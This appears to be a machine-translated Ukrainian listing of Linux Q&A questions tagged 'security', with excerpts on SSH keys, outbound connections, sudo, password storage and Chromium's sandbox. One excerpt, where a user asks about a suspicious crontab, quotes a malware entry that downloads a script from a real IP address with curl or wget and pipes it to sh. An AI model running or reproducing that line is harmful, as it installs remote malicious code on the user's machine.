Запитання з тегом «security»

Вміст, пов'язаний із захистом комп'ютерів, тобто необхідний вміст про політику, механізми та ін., Гарантує, що дані не просочуються чи не пошкоджуються та послуги доступні за будь-яких обставин.

2
«WannaCry» в системах Linux: Як ви захищаєте себе?
Відповідно до статті quick7, є кілька вразливих версій Samba, що дозволяють віддалене виконання коду в системах Linux: Незважаючи на те, що викупний черв'як WannaCry вплинув на системи Windows і його легко було ідентифікувати, з чіткими кроками виправлення, вразливість Samba вплине на системи Linux та Unix і може створити значні технічні …

3
Адміністратор сервера надіслав мені приватний ключ для використання. Чому?
Я повинен мати доступ до сервера для того, щоб зв’язати сервіси інсценування та реальні сервіси компанії в наш цикл розгортання. Адміністратор на їхній стороні встановив два екземпляри, а потім створив користувача на сервері для SSH в як. До цього я дуже звик. На моїй думці, що зараз станеться, я б …

7
Як я можу контролювати всі вихідні запити / з'єднання зі своєї машини?
Моя машина - це сервер, тому я хочу ігнорувати з'єднання, встановлені на моєму сервері (наприклад, коли хтось відвідує мій веб-сайт). Я хочу бачити лише з'єднання / запити, які здійснює мій сервер до інших місць. Як я бачу лише ті вихідні з'єднання? EDIT: Я новачок у подібних речах. Що я намагаюся …

3
Як curl захищає пароль від появи в PS-виведенні?
Я зауважив деякий час тому, що імена користувачів та паролі, задані curlяк аргументи командного рядка, не відображаються у psвиході (хоча, звичайно, вони можуть відображатися у вашій історії баш). Вони також не з'являються в /proc/PID/cmdline. (Довжина комбінованого аргументу ім’я користувача / пароля може бути отримана.) Демонстрація нижче: [root@localhost ~]# nc -l …

18
Кореневий доступ, який не може змінити пароль root?
У нас є невелика проблема на сервері. Ми хочемо, щоб деякі користувачі мали змогу це зробити, наприклад, sudoі стати root, але з тим обмеженням, що користувач не може змінити пароль root. Тобто, це гарантія того, що ми все ще можемо увійти на цей сервер і стати root, незалежно від того, …
66 ubuntu  security  sudo 

4
Чи є спосіб запобігти доданню команди до вашої історії?
Чи є спосіб запобігти доданню команди до вашої історії? У мене є команда, яку я хочу зберігати поза своїм історіальним файлом, і мені дуже байдуже, щоб вона була там, коли я шукаю історію, збережену в пам'яті, хоча це менше турбує. Чи є спосіб запобігти це чи мені просто потрібно повернутися …

2
Чи безпечно видавати свій відкритий ключ SSH для роботи?
В даний час я віддалено працюю з низкою організацій, які потребують регулярного доступу до їх серверів для обслуговування та оновлення. Чи безпечно я додати в .ssh/authorized_keysфайл мій загальнодоступний ключ SSA RSA, щоб дозволити мені входити набагато швидше / без необхідності пошуку паролів? Я працюю з припущенням, що неможливо генерувати приватний …

4
Переміщення / var, / home, щоб розділити розділ
Я намагаюся перемістити деякі папки (наприклад, /varта /home) в окремий розділ, прочитавши цей посібник: 3.2.1 Виберіть інтелектуальну схему розділів Мені вдалося перемістити одну папку успішно, дотримуючись цього керівництва. Однак, схоже, це не працює для декількох папок, і всі мої папки скидаються в розділ без належних папок. Я хотів би встановити …

2
Підозрілий запис на клінтах працює "xribfa4" кожні 15 хвилин
Я хотів щось додати до мого файлу кореневого кронт-файлу на моєму Raspberry Pi, і знайшов запис, який мені здається підозрілим, в пошуках його частин в Google нічого не виявилося. Запис Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Вміст http://103.219.112.66:8000/i.sh: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin …
59 security  cron  malware 

2
Що означає варіант Chromium `--no-sandbox`?
Я запускаю Chromium так: chromium --no-sandbox Я роблю це, тому що я запускаю Debian Squeeze на OpenVZ VM Container, і це єдиний спосіб, коли я можу змусити його працювати. Хоча я продовжую читати, це жахливо . Але я хочу знати, чому саме так. Може хтось, будь ласка, пояснить це мені? …

1
Чому перші 1024 порти обмежені лише для кореневого користувача?
Це більше простою цікавості, ніж будь-що інше. Мій друг запитав мене: "Який діапазон портів може використовувати тільки root під Linux?" Я сказав йому, що 0-1024 були обмежені. Тоді він запитав мене, чому це так, і ... я розгубився. Поняття ні про що. Чи є причина, чому ці порти обмежені, а …

5
Mutt: як безпечно зберігати пароль?
Мій файл .muttrc виглядає як цей або побачити нижче проблиск. Я вагаюся з паролем. Як я повинен зберігати свій пароль, щоб ним користуватися mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
Перетворіть ключ Amazon .pem у ключ Putty .ppk Linux
Я створив та завантажив приватний .pemключ із AWS. Однак для використання Putty для підключення до віртуальної машини я повинен мати цю клавішу у .ppkформаті. Процес перетворення детально описаний приблизно в 20 рядках: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Я використовую Linux Mint (дистрибутив Ubuntu), і я знаю, що можу використовувати puttygen в терміналі. Однак я …

2
Як визначити процес, який не має під?
У мене є процес, який слухають 2 порти: 45136 / tcp і 37208 / udp (насправді я припускаю, що це той самий процес). Але netstat не повертає жодного pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Той самий результат із "grep 37208". Я також спробував …

7
Як я рекурсивно подрібнюю все дерево каталогів?
У мене є дерево каталогів, яке я хотів би подрібнити за допомогою утиліти "клаптик" Linux. На жаль, клаптик не має -Rможливості для рекурсивного подрібнення. Як я можу подрібнювати ціле дерево каталогів рекурсивно?

Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.